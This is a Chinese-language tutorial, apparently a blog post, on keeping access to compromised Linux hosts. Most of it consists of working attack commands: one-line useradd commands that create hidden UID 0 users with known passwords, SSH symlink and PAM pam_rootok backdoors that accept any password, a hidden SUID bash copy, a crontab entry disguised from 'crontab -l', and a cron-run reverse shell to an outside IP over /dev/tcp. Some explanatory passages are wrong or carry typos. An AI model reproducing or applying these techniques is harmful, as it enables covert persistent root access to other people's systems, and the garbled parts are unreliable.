一句话添加root权限用户

维持访问技战术-Linux_ci

dock下载Ubuntu

维持访问技战术-Linux_软连接_02

创建root权限用户

useradd -p '$6$hy2iJadR$hioG2qwc94/HilXtJqQcyXwX.gHJQ0TvPCTfJZcAWxTWTtzFxzI6t58Dv15TokQBMO8F7FtsA4EcNaM3rRKUT0' newuser -o -u 0 -g root -G root -s /bin/bash -d /home/newuser

创建普通权限用户

useradd -p '$6$1j6I2pdV$AUSaBA.4ug4i/uB/rYPNEdAD.93.j4mIJMjeOFZx8j.NiNWLEVKu4dzFLtVQC5cThzNyMu/SbQWp1d./gX2d71' newuser

创建完毕后,就可以使用用户和密码登录系统了

用户名: newuser

密码: 123456

------------------- 方法2(常见) -------------------


创建root权限用户

用户名: newuser

密码: 123456


useradd -p `openssl passwd -1 -salt 'newuser' 123456` -o -u 0 -g root -G root -s /bin/bash -d /usr/bin/newuser newuser

创建普通权限用户

用户名: newuser

密码: 123456

useradd -p `openssl passwd -1 -salt 'newuser' 123456` newuser

步骤

docker images  | grep ubuntu

docker ps -a | grep ubuntu

维持访问技战术-Linux_ci_03

启动ubuntu

docker start 5122b94e46e(ubuntu)

docker ps

维持访问技战术-Linux_软链接_04

docker exec -it 5122b94e46e /bin/sh #就进入到了ubuntu的终端里

维持访问技战术-Linux_软链接_05

给root用户设置密码

passwd root

维持访问技战术-Linux_软连接_06

然后更新一下系统

atp-get update

atp-get install nano

atp-get install opensll

维持访问技战术-Linux_软连接_07

添加一句话增加root权限用户,这样写可以在无回显的状态下加guest01加入到用户组并且密码设置为123456

维持访问技战术-Linux_ci_08

ssh 软连接后们

SSH软连接后们是一种安全威胁,它涉及到公鸡者创建一个SSH服务的软连接(symbolic link)到一个不同的可执行文件,通常是一个特权提升或认证绕过的程序。这样做的目的是让公鸡者在不知道真正的SSH密码的情况下,通过SSH连接到系统并获得未授权的访问权限。

例如,公鸡者可能会创建一个指向susudo程序的软连接,这两个程序通常只需要root用户的密码就可以执行特权命令。如果SSH服务被配置为使用这个软连接作为其可执行文件,那么公鸡者就可以使用任何密码(甚至是错误的密码)通过SSH登录,并且由于susudo的特性,他们可能会被提示输入root用户的密码,一旦输入正确,就能获得系统的完全控制权。

这种类型的后们通常涉及以下步骤:

  1. 公鸡者获取对目标系统的访问权限。
  2. 公鸡者创建一个指向特权提升程序(如susudo)的软连接。
  3. 公鸡者修改SSH服务的配置,使其指向这个新的软连接。
  4. 公鸡者等待其他用户尝试通过SSH登录,或者自己尝试登录,利用后们绕过正常的认证过程。

如何创建SSH软链接后们

脚本

  1. 创建软链接:公鸡者会在系统上创建一个指向susudo程序的软链接,而不是创建一个新的二进制文件。这是因为susudo程序通常只需要root用户的密码就可以执行特权命令。
    例如,使用ln命令创建软链接:
ln -s /usr/bin/sudo /usr/sbin/sshd
  1. 修改SSH配置:公鸡者会修改SSH服务的配置文件/etc/ssh/sshd_config,将AuthorizedKeysFile选项设置为一个不存在的文件路径,或者设置为一个任何人都可以读取的公共密钥文件。
    例如,修改配置文件:
echo "AuthorizedKeysFile /nonexistent/.ssh/authorized_keys" >> /etc/ssh/sshd_config
  1. 重启SSH服务:公鸡者会重启SSH服务,使配置更改生效。
    例如,重启服务:
service sshd restart

二进制文件

步骤1: 创建二进制文件

你可以使用C语言编写一个简单的程序,然后使用GCC编译成二进制文件。以下是一个简单的C语言程序示例,它会打印一条消息然后调用原始的sshd二进制文件:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char *argv[]) {
    execl("/usr/sbin/sshd", "sshd", NULL);
    return 0;
}

这个程序实际上并没有做任何有害的事情,它只是调用了原始的sshd。在实际的后们中,你可能会插入恶意代吗,比如记录会话数据或转发连接。

步骤2: 编译二进制文件

使用GCC编译上面的C程序:

gcc -o sshd_backdoor sshd_backdoor.c

这将创建一个名为sshd_backdoor的二进制文件。

步骤3: 创建软链接

将这个二进制文件放置在一个合适的位置,然后创建一个软链接,让SSH守护进程调用这个二进制文件而不是真正的sshd

cp sshd_backdoor /usr/local/bin/
ln -sf /usr/local/bin/sshd_backdoor /etc/init.d/sshd

请注意,这个示例中的路径和方式可能需要根据实际系统配置进行调整。

步骤4: 重启SSH服务

重启SSH服务,使更改生效:

service ssh restart

安全警告

再次强调,这个示例仅用于教育目的,不应在未经授权的系统上实施。在真实环境中,创建SSH后们是非常危险的,可能导致严重的安全后果和法律责任。始终确保你的行动符合法律和道德规范。

维持访问技战术-Linux_软链接_09

ssh lonelyor@192.168.88.76

维持访问技战术-Linux_软链接_10

cat /etc/ssh/sshd_config | grep UsePAM

查看一下是不是pm认证

这段代码是一个Linux命令,用于查看/etc/ssh/sshd_config文件中是否设置了UsePAM选项,以及它的值是什么。下面是对这段代码的注释:

# 打开终端并输入以下命令 
cat /etc/ssh/sshd_config | grep UsePAM
 
# 命令解释:
# cat /etc/ssh/sshd_config: 这个部分使用`cat`命令来显示`/etc/ssh/sshd_config`文件的内容。这个文件包含了SSH守护进程(sshd)的配置信息。 
# |: 这是一个管道符号,用于将`cat`命令的输出作为输入传递给下一个命令。 
# grep UsePAM: 这个部分使用`grep`命令来搜索`UsePAM`这个关键词。`grep`命令会在前一个命令的输出中查找包含`UsePAM`的行,并显示这些行。 
 
# 整体效果:
# 这个命令组合的结果是显示`/etc/ssh/sshd_config`文件中所有包含`UsePAM`关键词的行。通常,你会看到类似以下的输出:
# UsePAM yes 
 
# 输出解释: 
# UsePAM yes: 这表示SSH守护进程启用了PAM(Pluggable Authentication Modules)认证机制。PAM是一个灵活的认证框架,允许系统管理员定制和扩展系统的认证方式。

这个命令对于系统管理员来说非常有用,因为它可以帮助他们快速检查SSH服务是否配置为使用PAM进行认证。如果UsePAM被设置为yes,则意味着SSH服务将使用PAM来处理用户的认证请求。这对于理解系统的安全配置和进行安全审计非常重要。

这个名字不能随意的命名,如何命名输入这个命令

维持访问技战术-Linux_软链接_11

find /etc/pam.d | xargs grep "pam_rootok"

维持访问技战术-Linux_软连接_12

橘色的框里so文件,只要我们包含它就可以实现相关的后们功能

维持访问技战术-Linux_软链接_13

用root权限执行相关命令

维持访问技战术-Linux_ci_14

ln -sf /usr/sbin/sshd /tmp/chfn;/tmp/chfn -oPort=1234

这段代码是一个Linux命令序列,用于创建一个恶意的软链接,并尝试启动一个修改过的SSH服务。下面是对这段代码的注释:

# 打开终端并输入以下命令 
ln -sf /usr/sbin/sshd /tmp/chfn; /tmp/chfn -oPort=1234 
 
# 命令解释:
# ln -sf /usr/sbin/sshd /tmp/chfn: 这个部分使用`ln`命令来创建一个软链接(symbolic link)。`-s`选项表示创建软链接,`-f`选项表示强制覆盖已存在的文件。`/usr/sbin/sshd`是原始的SSH守护进程可执行文件,而`/tmp/chfn`是新创建的软链接的目标位置。通常,`chfn`是一个用于改变用户全名的命令,但在这里被用作软链接的名称,可能是为了隐藏恶意意图。 
 
# ;: 这是一个分号,用于分隔两个独立的命令。在Linux中,你可以在一行中输入多个命令,并用分号分隔它们。
 
# /tmp/chfn -oPort=1234: 这个部分尝试执行前面创建的软链接`/tmp/chfn`,并传递一个命令行选项`-oPort=1234`。这个选项不是标准的SSH守护进程选项,而是被设计来启动一个修改过的SSH服务,监听端口1234而不是默认的22端口。 
 
# 整体效果: 
# 这个命令序列的目的是创建一个恶意的软链接,然后尝试启动一个可能被篡改的SSH服务,该服务监听非标准端口1234。这可能是为了绕过常规的防火墙规则或者隐藏恶意活动的痕迹。
 
# 警告: 
# 这个命令序列看起来像是一个恶意操作,可能是为了创建一个后们或者进行未经授权的访问。在实际的系统管理中,你不应该执行这样的命令,除非你完全理解它的作用,并且有合法的理由去修改SSH服务的配置。如果你怀疑系统已经被入侵,你应该立即进行安全审计,并采取适当的措施来恢复系统的安全性。

请注意,执行这样的命令可能会对你的系统安全造成严重威胁,因此在实际操作中应始终谨慎,并确保你有充分的理由和权限来进行此类更改。如果你不是系统管理员或者不熟悉这些命令的影响,最好不要执行它们。

维持访问技战术-Linux_软链接_15

echo "auth sufficient pam_rootok.so" >> /etc/pam.d/hacker

这段代码是一个Linux命令,用于向/etc/pam.d/hacker文件追加一行内容,该内容是PAM(Pluggable Authentication Modules)的一个认证模块配置。下面是对这段代码的注释:

# 打开终端并输入以下命令
echo "auth sufficient pam_rootok.so" >> /etc/pam.d/hacker 
 
# 命令解释:
# echo "auth sufficient pam_rootok.so": 这个部分使用`echo`命令来输出一段文本。`"auth sufficient pam_rootok.so"`是要输出的文本内容,它是一条PAM配置指令。
 
# >>: 这是重定向操作符,用于将`echo`命令的输出追加到指定的文件中。如果文件不存在,它会创建一个新文件;如果文件已存在,它会将输出添加到文件的末尾。
 
# /etc/pam.d/hacker: 这是要追加内容的文件路径。在大多数Linux系统中,`/etc/pam.d/`目录包含了用于不同应用程序的PAM配置文件。`hacker`是一个自定义的文件名,它可能是一个虚构的文件名,用于说明这个命令的作用。
 
# 整体效果: 
# 这个命令的目的是向`/etc/pam.d/hacker`文件追加一行PAM配置,该配置指定了`pam_rootok.so`模块作为认证的一部分。`sufficient`关键字表示如果这个模块成功返回,认证过程就会成功,不再继续检查后续的模块。`pam_rootok.so`模块通常用于允许root用户直接通过认证,而不需要提供密码。 
 
# 警告:
# 这个命令看起来像是在尝试修改系统的PAM配置,以便root用户可以无密码认证。这可能是一个恶意操作,因为它降低了系统的安全性,使得公鸡者更容易以root权限登录。在实际的系统管理中,你不应该随意修改PAM配置,除非你完全理解它的作用,并且有合法的理由去这样做。如果你怀疑系统已经被入侵,你应该立即进行安全审计,并采取适当的措施来恢复系统的安全性。

维持访问技战术-Linux_ci_16

cat /etc/pam.d/hacker

可以看到so模块

然后使用软连接去链接这个文件

维持访问技战术-Linux_软连接_17

ln -sf /usr/sbin/sshd /tmp/hacker;/tmp/hacker -oport=12345

端口设置为12345

回到kali

维持访问技战术-Linux_软链接_18

ssh 192.168.88.6 -p 12345

然后密码这里随便输入,回车

维持访问技战术-Linux_ci_19

就可以看到目标的终端

维持访问技战术-Linux_软连接_20

将端口改成1234

随便输入密码

维持访问技战术-Linux_软链接_21

也可以进入到目标终端里

ssh软连接需要ssh配置允许pm认证才能使用还有被控主机不允许root登录也可以用其他已存在的用户登录

维持访问技战术-Linux_软连接_22

ssh lonelyor@192.168.88.76-p 1234


第三种

任意密码的核心是包含了so程序

预防后们的做法

nano /etc/ssh/sshd_config | grep UsePAM

维持访问技战术-Linux_软连接_23

将这里的yes改成no就可以了

原理:

软连接后们的原理是利用了PAM配置文件的作用,将sshd文件软连接名称设置为su,这样应用在启动过程中会去PAM配置文件中寻找是否存在对应名称的配置信息(su),su在pam_rootok只检测uid 0 即认证成功,导致可以使用任意密码去登录。


ssh软连接后们实现:

被公鸡机:

ln -sf /usr/sbin/sshd /usr/local/su;/usr/local/su -oPort=4444

维持访问技战术-Linux_ci_24

公鸡机进行连接(密码这里可以任意输入):

维持访问技战术-Linux_软连接_25

成功登录!

ssh软连接后们检测响应:

natstat -anutpl

维持访问技战术-Linux_软连接_26

查看系统当前的端口状态:

last

维持访问技战术-Linux_ci_27

经测试,普通用户建立软连接没有问题,但是在使用软连接启动sshd指定端口时,无法load host key只测试成功了root用户下执行后们命令,然后通过其他普通用户任用密码登录

通过软连接建立后们

ln -sf /usr/sbin/sshd /usr/local/su;/usr/local/su -oport=12345

说明:建立软连接到/usr/local/su 文件,也可以在其他目录,su文件名字不能变,变了就无法登录。当然可以通过其他设置,更改su名字也是可以的。然后启动,并指定监听12345端口,登录的时候密码随意即可,登录如下:

注意:这个如果目标在执行软连接的时候,如果使用了其他账号创建,则登录的时候需要使用对应的账号,而非root

ssh root@xxx.xxx.xxx.xxx -p 12345

上面提到要更改软连接su名字,需要用以下命令,xxxxxx为你需要更改的名字:

echo " 
 #%PAM-1.0
 auth       sufficient   pam_rootok.so
 auth       include      system-auth
 account    include      system-auth
 password   include      system-auth
 session    include      system-auth " >> /etc/pam.d/xxxxx

之后再开启端口监听,用于登录

ln -sf /usr/sbin/sshd /tmp/xxxxxx;/tmp/xxxxxx -oport=12345

也可以使用其他软连接名字,但是文件必须得在/etc/pam.d 目录下存在。在/etc/pam.d目录下执行:

find /etc/pam.d |xargs grep "pam_rootok"
./config-util:auth sufficient pam_rootok.so
./chfn:auth sufficient pam_rootok.so
./chsh:auth sufficient pam_rootok.so
./runuser:auth sufficient pam_rootok.so
./su:auth sufficient pam_rootok.so
./xxxxxx:auth sufficient pam_rootok.so

登录方式

ln -sf /usr/sbin/sshd /tmp/chsh;/tmp/chsh -oport=23333
ln -sf /usr/sbin/sshd /tmp/chfn;/tmp/chfn -oport=23334
ln -sf /usr/sbin/sshd /tmp/runuser;/tmp/runuser -oport=23335

维持访问技战术-Linux_软链接_28

Autoruns自动化工具

Autoruns是一个由Sysinternals开发的自动化工具,用于管理Windows操作系统的自动启动项。它可以显示并控制哪些程序和服务在系统启动时自动运行。通过使用Autoruns,用户可以查看、添加、删除和禁用各种自动启动项,从而优化系统性能和安全性。

以下是Autoruns的一些主要功能:

  1. 显示自动启动项Autoruns可以列出所有在系统启动时自动运行的程序和服务,包括那些由Windows、第三方软件和用户配置的项目。
  2. 管理启动项:用户可以通过Autoruns启用或禁用特定的自动启动项,从而控制哪些程序和服务在系统启动时运行。
  3. 编辑启动配置Autoruns允许用户编辑注册表中的启动配置,包括修改启动项的路径、参数和其他设置。
  4. 诊断启动问题:通过查看和管理自动启动项,用户可以诊断和解决可能导致系统启动缓慢或不稳定的问题。
  5. 创建自定义配置:用户可以创建和保存自定义的启动配置,以便在不同场景下快速应用不同的启动设置。
  6. 导出和导入设置Autoruns支持导出和导入自动启动项的设置,方便用户在不同系统之间迁移配置。

使用Autoruns可以帮助用户优化系统性能,减少不必要的资源占用,并提高系统的安全性和稳定性。

下载与安装

  1. 访问官方网站:前往Sysinternals官方网站(https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns)下载最新版本的`Autoruns`。
  2. 下载安装包:选择适合你操作系统的版本(32位或64位),下载安装包。
  3. 运行安装程序:双击下载的安装包,按照提示完成安装过程。安装过程中可能需要管理员权限,请根据提示进行操作。
  4. 启动Autoruns:安装完成后,可以在“开始”菜单或桌面上找到Autoruns图标,双击启动程序。

使用Autoruns

  1. 查看自动启动项:首次启动Autoruns时,程序会自动列出所有在系统启动时自动运行的程序和服务。主窗口分为多个部分,包括“启动”、“登录”、“服务”、“驱动程序”等,分别显示不同类型的自动启动项。
  2. 禁用启动项:如果你发现某个程序或服务不需要在启动时运行,可以选择该项目,然后点击右键选择“禁用”或者直接按下键盘上的“Delete”键。禁用的项目将在下次系统启动时不再自动运行。
  3. 启用启动项:如果某个项目被禁用了,可以通过同样的方式选择该项目,然后点击右键选择“启用”来恢复其自动启动功能。
  4. 编辑启动配置:点击某个项目,可以在右侧的详细信息区域看到该项目的配置信息,包括路径、参数等。你可以修改这些配置,然后点击“应用”按钮保存更改。
  5. 保存和加载配置Autoruns允许你保存当前的自动启动项配置,以便在需要时恢复。点击“文件”菜单,选择“保存”或“加载”来操作配置文件。
  6. 查看日志:如果你不确定某个项目的用途,可以点击“帮助”菜单,选择“在线帮助”来查看详细的说明和日志信息。
  7. 应用更改:完成所有配置后,点击“应用”按钮保存所有的更改。某些更改可能需要重启系统才能生效。

通过使用Autoruns,你可以有效地管理系统的自动启动项,优化系统性能和安全性。

suid权限维持

在Linux系统中,SUID(Set User ID upon execution)权限是一种特殊的文件权限,它允许一个程序在执行时采用文件所有者的权限级别,而不是执行者的权限。这种特性可以被系统管理员用于管理工具,如passwd,以允许普通用户修改他们的密码而不必知道root密码。

对于公鸡者来说,如果能够找到具有SUID权限的可执行文件,并且这些文件中有安全漏动或设计缺陷,那么他们可以通过利用这些文件来提升自己的权限至root,即所谓的"SUID提权"。一旦获得了SUID权限的可执行文件,公鸡者可以利用它们来执行以下几种类型的公积:

  1. 直接提权: 如果SUID程序有编程错误,如缓冲区溢出或格式字符串漏动,公鸡者可以利用这些漏动来执行任意代码,从而提升自己的权限。
  2. 间接提权: 即使没有明显的编程错误,有些SUID程序也可能被用来间接提权,例如通过读取或修改本应受限的系统资源。
  3. 持久化: 公鸡者可以利用SUID权限来创建持久化的后们,即使系统重启后仍然存在。这通常涉及到修改系统配置或创建新的SUID可执行文件,以便在未来的会话中继续提供访问权限。

以下是一些维持SUID权限的方法:

  • 创建或修改SUID可执行文件:公鸡者可以尝试修改现有的SUID程序或创建新的具有SUID权限的程序,以供未来使用。
  • 计划任务:利用cronat等计划任务工具,定期执行SUID程序或包含后们的脚本。
  • 服务配置:修改服务配置,使其在启动时执行SUID程序。
  • 内核模块:加载或修改内核模块,以创建SUID权限的持久化方法。
  • 利用已知漏动:如果系统上存在已知的SUID程序漏动,公鸡者可以利用这些漏动来维持他们的访问权限。

然而,维持SUID权限的任何尝试都应该被视为非法和犯罪行为,除非是在合法授权的渗投测试或安全审计环境中进行。系统管理员应定期检查SUID文件,确保它们是最新的并且没有被篡改,以维护系统的安全性。

进入Ubuntu的root

维持访问技战术-Linux_软链接_29

whereis bash

第一步找到bash文件

维持访问技战术-Linux_软连接_30

复制bash文件

cp /bin/bash /tmp/.bash

cd /tmp

输入ls是看不到隐藏的.bash文件的

维持访问技战术-Linux_软连接_31

设置相应权限

chmod 4755 /tmp/.bash  #这里的4就是指suid的意思

维持访问技战术-Linux_ci_32

su lonelyor 

普通权限

维持访问技战术-Linux_软链接_33

运行bash

/tmp/.bash -p

维持访问技战术-Linux_软连接_34

看一下需要root权限的shadow文件能不能读

cat /ect/shadow

维持访问技战术-Linux_软连接_35

可以读说明是有一定权限限制的root权限

维持访问技战术-Linux_ci_36

比如说创建一个文件

touch test.txt

就可以发现,虽然用户权限是root,但是用户组却是lonelyor

维持访问技战术-Linux_软链接_37

计划任务后们

在Linux系统中,计划任务(Scheduled Tasks)是系统自动化执行脚本或命令的一种方式,通常使用cron(定时任务守护进程)来管理。计划任务后们指的是黑课或公鸡者利用cron作业来植入恶意代吗或脚本,以便在特定时间或周期性地执行,从而维持对系统的长期控制或执行恶意活动。

实现计划任务后们的方式

  1. 添加cron作业: 公鸡者可以在用户的crontab文件中添加新的作业条目,或者修改现有条目,以执行恶意脚本。这通常涉及到使用crontab -e命令编辑用户的crontab文件。
  2. 系统级cron作业: 除了用户级别的cron作业,公鸡者还可以尝试修改系统级别的cron配置文件,如/etc/crontab/etc/cron.d/目录下的文件,以植入后们。
  3. 反弹Shell脚本: 恶意脚本可以配置为在特定时间向公鸡者的服务器发起网络连接,建立反弹Shell,从而允许远程控制。
  4. 隐藏的cron作业: 公鸡者可能会使用一些技巧来隐藏cron作业,比如使用空格、注释符或特殊字符来混淆条目,或者利用cron的特性来在不明显的地方插入命令。
  5. 权限维持: 计划任务后们可以被设计为在系统重启后依然有效,确保公鸡者能够持续访问系统,即使他们被暂时踢出。

防御和检测计划任务后们

  1. 定期检查cron作业: 系统管理员应定期检查所有用户的crontab文件以及系统级的cron配置,寻找任何可疑的条目。
  2. 文件完整性检查: 使用如AIDETripwire这样的工具来监控关键文件的变化,包括cron相关的文件和脚本。
  3. 权限审核: 定期审核用户的权限和cron作业的权限,确保只有授权用户可以修改cron作业。
  4. 日志分析: 分析系统日志,尤其是cron的日志文件,寻找异常活动的迹象。
  5. 更新和打补丁: 确保操作系统和cron守护进程是最新的,及时应用安全更新和补丁。
  6. 最小权限原则: 应用最小权限原则,限制用户和进程可以执行的操作,减少公鸡面。

结论

计划任务后们是黑课维持对目标系统控制的一种常见手段,尤其是在成功的初始入侵之后。系统管理员必须采取积极的措施来防止和检测这类后们,以保护系统的完整性和安全性。

维持访问技战术-Linux_软连接_38

crontab -l #当我输入这个查看定时任务命令的时候,他就会输出上图的话

(crontab -l;printf "*/1 * * * * /bin/bash --noprofile -i;\rno crontab for 'whoami'%100c\n")|crontab -

这段代码是一段Shell脚本,它被设计用来向当前用户的cron作业列表中添加一个新的定时任务。cron是一个在Unix和类Unix操作系统中用于周期性执行任务的守护进程。下面是对这段代码的详细解释:

(crontab -l;printf "*/1 * * * * /bin/bash --noprofile -i;\rno crontab for 'whoami'%100c\n")|crontab -
  1. crontab -l:这个命令列出当前用户的所有cron作业。
  2. printf "*/1 * * * * /bin/bash --noprofile -i;\rno crontab for 'whoami'%100c\n":这部分代码使用printf命令生成一个新的cron作业。具体来说:
  • */1 * * * *:这是cron表达式,表示每分钟执行一次后面的命令。
  • /bin/bash --noprofile -i:这是要执行的命令。--noprofile选项告诉bash不要加载任何启动文件(如/etc/profile~/.bashrc),-i选项表示交互模式。
  • ;\rno crontab for 'whoami'%100c\n:这部分似乎是为了在执行crontab -l时显示一条消息,但实际上它的作用并不明确,因为它包含了一些奇怪的字符和格式。
  1. ():这个小括号创建了一个子shell环境,使得crontab -lprintf命令的输出可以合并在一起。
  2. |:这是管道符号,将前一个命令的输出作为后一个命令的输入。
  3. crontab -:这个命令从标准输入读取cron作业,并将它们添加到当前用户的cron作业列表中。

综合来看,这段代码的效果是向当前用户的cron作业列表中添加一个每分钟执行一次的bash shell,该shell以交互模式运行,但不加载任何启动文件。这可能被用于创建一个后们,允许公鸡者在每分钟的任意时刻以当前用户的身份远程登录到系统中。

维持访问技战术-Linux_软链接_39

这里就多了一个空行

维持访问技战术-Linux_软连接_40

cd /var/spool/cron/crontabs/

ls

sudo cd /var/spool/cron/crontabs/

维持访问技战术-Linux_ci_41

su root

维持访问技战术-Linux_ci_42

cat lonelyor  #查看用户相应的内容

维持访问技战术-Linux_软连接_43

crontab -l #定时任务的列表

维持访问技战术-Linux_ci_44

用vim看一下

vim lonelyor

维持访问技战术-Linux_ci_45

这样一个计划任务后们就完成了

定时任务后们

使用crontab命令进行反弹shell。crontab命令用于设置周期性被执行的指令。新建shell脚本,利用脚本进行反弹

当管理员输入定时任务清单的时候只能看到这句话

维持访问技战术-Linux_ci_46

如果管理员没有添加定时任务就不会怀疑,如果添加了管理员还是会怀疑的

维持访问技战术-Linux_软连接_47

用下面命令还是可以看得到

less lonelyor
vim lonelyor
 ll | grep cron.*

维持访问技战术-Linux_软连接_48

crontab -u root -r //删除
crontab -u root -l //查看
crontab -u root -e //修改


crontab -u root -l //查看计划任务

维持访问技战术-Linux_ci_49

1.创建反弹shell脚本,vim /etc/.evil.sh

#!/bin/bash
bash -i >& /dev/tcp/192.168.52.130/7777 0>&1


维持访问技战术-Linux_软链接_50

并加上可执行权限

chmod +x /etc/.evil.sh

2.添加计划任务

我们可以使用crontab -e或者vim /etc/crontab添加计划任务

#添加计划任务
vim /etc/crontab
#查看计划任务
cat /etc/crontab

设置定时任务为每分钟执行一次

*/1 * * * * root /etc/.evil.sh #每一分钟执行一次


维持访问技战术-Linux_软链接_51

kali机器开启监听

nc -lvvp 7777

kali机器收到反弹shell

维持访问技战术-Linux_软连接_52